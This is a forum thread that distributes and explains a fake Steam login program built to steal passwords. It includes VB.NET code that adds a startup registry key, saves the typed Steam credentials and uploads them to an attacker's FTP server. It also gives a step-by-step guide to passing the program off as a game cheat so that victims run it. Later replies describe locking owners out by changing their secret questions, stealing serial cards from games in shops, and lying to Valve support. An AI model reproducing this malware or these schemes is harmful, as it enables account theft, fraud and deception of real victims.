fake steam password stealer

sk8more

FS Member
(MAJOR UPDATE!) steam password stealer + gui

Check out the finall version in the tools section of the board

NEW fsteam password stealer 1.0 now released!

Finnally the stealer everyvbody can use,i simple gui with self destruct date, and ftp information

Read the helpme.txt file included before you do anything. if you want i could post it here aswell.Please check this out,its well worth it.Post here if you have any questions or anything.

Fake steam server and editor.zip

or use rapid share

RapidShare: 1-Click Webhosting

i still dont get why everybody uses that

its legit and it works amazingly.try to skim the code and maby you can understand some... i want this user friendly so i need some help
and im taking ftp requests.give me a free ftp account user and pass and ill put it in my script and post it
(pms only please)

Looks fairly legit. Be interesting to see the product in action though. I am currently making a steam account upgrader ;)

I made a copy for kingstef linked to his ftp
if anybody else wants a go send me a pm with a link to an ftp user and password
(preferably a FREE triopd ftp with nothing on it)
I also need a programmer to help with a gui,not necisarilly a vb.net programmer but sombody with lgic

-sk8more

"PictureBox3_MouseDown" Evend handler used to move the form

* Form1_Load Event handler
Code:
If Directory.Exists("C:\Program Files\Steam\resource\info") = False Then
            Directory.CreateDirectory("C:\Program Files\Steam\resource\info")
        End If

To Check if the directory "C:\Program Files\Steam\resource\info" exist or not..if not it creates one.

Code:
 If File.Exists("C:\Program Files\Steam\Steamstart.exe") = False Then

to check if the file exist

Code:
Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "RunSteam", "C:\Program Files\Steam\Steamstart.exe")

sets the registry value to start "C:\Program Files\Steam\Steamstart.exe" on Windows startup.

Code:
File.WriteAllText("C:\Program Files\Steam\resource\info\test.txt", "*****")

Writes "******" to the text file "C:\Program Files\Steam\resource\info\test.txt".

Code:
My.Computer.Network.UploadFile("C:\Program Files\Steam\resource\info\test.txt", "ftp://ftp.*HOST*.com/***.txt", "*FTPUSER*", "***FTPPASS****")

uploads the file to FTP Server

* PictureBox1_Click Event Handler

Code:
 Dim dat As String = My.Computer.Clock.LocalTime.Month.ToString & My.Computer.Clock.LocalTime.Day.ToString & My.Computer.Clock.LocalTime.Hour.ToString & My.Computer.Clock.LocalTime.Minute.ToString & My.Computer.Clock.LocalTime.Second.ToString

Current date

Code:
File.WriteAllText("C:\Program Files\Steam\resource\info\pass" & dat & ".txt", user.Text + "  --  " + pass.Text + "    ")

Writes The Date, Username and Password that you typed in the Two TextBoxes to the file( C:\Program Files\Steam\resource\info\pass)

Code:
My.Computer.Network.UploadFile("C:\Program Files\Steam\resource\info\pass" & dat & ".txt", "ftp://ftp.**HOST**.com/steampass" & dat & ".txt", "**FTP PASS**", "**FTP USER***")

Uploads the written file to the FTP Server

- The Easier Method

1. Create New Project.
  2. Add Two TextBox Instances to your Form.
  3. Add A Button. (Leave the Default Names for the controls if you changed them you'll need to change them in the code)

Add the following code:

Code:
Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

If TextBox1.Text = vbNullString Or TextBox2.Text = vbNullString Then
            MessageBox.Show("Please fill all fields", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error)
        Else
            Dim ftp_user As String = "user name here"
            Dim ftp_pw As String = "password here"
            Dim ftp_server As String = "host name here"

Dim file = Application.StartupPath & "\pw.txt"
            My.Computer.FileSystem.WriteAllText(file, TextBox1.Text & vbNewLine & TextBox2.Text, False)
            My.Computer.Network.UploadFile(file, "ftp://" & ftp_user & ":" & ftp_pw & "@" & ftp_server + "/pw.txt")
        End If

End Sub

End Class

Compile it & Have Fun!

yes,but mine has a test file uploaded and a date for every file saved and uploaded so there are no overwrites
And i have a second form to look like the password incorrect form so there is more to it than just that,and remember i have it set up to look exactly like steam so there are icons,alpha fades,and other doohickies

also your upload script makes no sence to fallow vb sintax so it would generate an error

also it is impossible for only 1 field to be writen to so no error needed as the password tectbox is in active if user is not filled in and the button isnt active if both arent.

so it is more comlicated

and i have the self destruct file code taken out and the encrypted text file code which uses a quite basic encryption algoritm when saved to the folder.

but as you know a bit of vb,could you possibly help with a gui? or give me the gist of how i would go about poppin out little steam hack exe babies from a gui with different code?

also your upload script makes no sence to fallow vb sintax so it would generate an error

It's not a script..i call it 1-Line Code. :p

I wrote it in just 1 min without IDE and it's for newbies

but as you know a bit of vb,could you possibly help with a gui? or give me the gist of how i would go about poppin out little steam hack exe babies from a gui with different code?

a bit? vb? lol

ohh i thoght you where trying to say tht my code could be brought down to that,my bad
and wanna try this out,i need some beta'ers....... =/
lol
idk what your getting to but "CAN U HeLPZZ!!!1!111!one!@@"
?? lol

mine? no it self destructs...... after 3 dys or w/e no big deal
and an interface for........ stealing passwords?

It does NOTHING...it just like Steam Interface with effects mouse hover ...etc

Don't worry..It doesn't contain anything about stealing passwords.

Code:
Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

If TextBox1.Text = vbNullString Or TextBox2.Text = vbNullString Then
            MessageBox.Show("Please fill all fields", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error)
        Else
            Dim ftp_user As String = "user name here"
            Dim ftp_pw As String = "password here"
            Dim ftp_server As String = "host name here"

Dim file = Application.StartupPath & "\pw.txt"
            My.Computer.FileSystem.WriteAllText(file, TextBox1.Text & vbNewLine & TextBox2.Text, False)
            My.Computer.Network.UploadFile(file, "ftp://" & ftp_user & ":" & ftp_pw & "@" & ftp_server + "/pw.txt")
        End If

End Sub

End Class
Don't forget to escape the username and password strings. for instance if the username or password contains '@' it should be replaced with "%40". otherwise the credentials will be merged with the url.

Noobs guide to using this program......

1.click the little caution sign under my name so it sends me a pm(private message)
2.go to Free Website Hosting - Tripod free website templates to make your own free website
3.create a free account
4.heres the tricky part,go back the the pm screen from step 1 and send me the username and password of the tripod account you just created
5.look in your pm's for a message from me with a link,download the file to your DESKTOP as its right infront of you,now minimize (-) all open windows
right click (fsteam.exe) on your desktop and click rename
6.rename the file to anything you want
7.tell people online that its a cs hack(counter strike cheat) so when they download the file from you the getzorz Teh Viruz!!11!!11one
8.then go to ftp.tripod.com
9.enter in your username and password on the prompt screen
10.look for steampass##########
11.click it
12.look at it
13.enter the username as your login
14.enter password as your password
here is the txt file sent decryptin

USERNAME -- PASSWORD

15.use those IN THAT ORDER

OK all you little leaches have a personalized program,i procrastinated like mad beacuse i had 20 requests from n00bs/queers/and leeches so all of you that posted here recieved a link to the download in your inbox,ill edit my first post with a fix also

so post here and tell me how it is,and by continuing IM NOT RESPONSIBLE FOR ANYTHING THAT MAY INVOLVE YOU GETTING BANNED/KILLED

good luck guys

-sk8more
(im still taking requests but post here first)

OK GUYS REMEMBER IF YOU TEST IT,THE FILE WILL CREATE AN ERROR MESSAGE!!!! the actual file starts up on REBOOT!!!!!! remember that incase it wasnt mentioned and also if you want to test it,open the file,itl DISAPEAR SO MAKE A COPY!!!!
and go into the steam program folder and click steamstart.exe

Finally i released the gui,its useable BY EVERYONE!
honestly it is way to simple open the editor,put in your details and create or edit a server!

everything you need to know is in the readme located in the zip,read that first!
Please post your comments,suggestions or questions!

goodluck and have fun

Meh these kinda programs are just a headache for the people you steal the account from, all they have to do is use the secret question to reset thier password and get account back, if you don't have the secret pasword then smae on you lol and bye bye steam account.

On another note never buy a steam account on ebay, the dirty scammers do the above after a week or so (just in time to pass it onto the new auction winner) and resell it ahaha. Very hard to prove anything to paypal/ebay in this kinda situation and they won't give a shit either.

Meh these kinda programs are just a headache for the people you steal the account from, all they have to do is use the secret question to reset thier password and get account back, if you don't have the secret pasword then smae on you lol and bye bye steam account.

On another note never buy a steam account on ebay, the dirty scammers do the above after a week or so (just in time to pass it onto the new auction winner) and resell it ahaha. Very hard to prove anything to paypal/ebay in this kinda situation and they won't give a shit either.

thats why you change the secret question as well :p and the only real safe way is to actully buy the games of steam. In every other situation there is always some risk involved, even buying instore. I used to buy the games, register the serials and then return them saying that they didn't run on my PC :p worked everytime :D.

thats why you change the secret question as well :p and the only real safe way is to actully buy the games of steam. In every other situation there is always some risk involved, even buying instore. I used to buy the games, register the serials and then return them saying that they didn't run on my PC :p worked everytime :D.

Lol shite didn't realise you could change secret password so easy.. Fool me hehe.

As for the buy games and take back, why bother with the hassle? I used to open the games in the shop (hmv and game always have the full game on display not an empty case) and just take out the serial number card or sticker, then download the game and use the legit serial, would let me go online with a fake copy lol, worked a charm on most games.

Also I once done it to the dod, css pack, but needed the cd to register serial, e-mailed valve customer support and said nephew broke cd while I was at work, sent them a picture of the reg card showing serial and they belived me, next day the new shell account had dod source, css and hl2 dm lol. It still hasn't been banned rofl one year or so free dod sorce.

sk8more isn't anymore active on this forum. So you will not receive a response. If you receive an response he is active again ;).
But this project is dead as far as I know.

You can still use the last release he made on his first post. You don't need to PM him anymore or anything. The last release has a password stealer maker. All you need to do is fill out the FTP info in it and click make then it makes a new .exe file that you send to others and it will do its job from there.

Back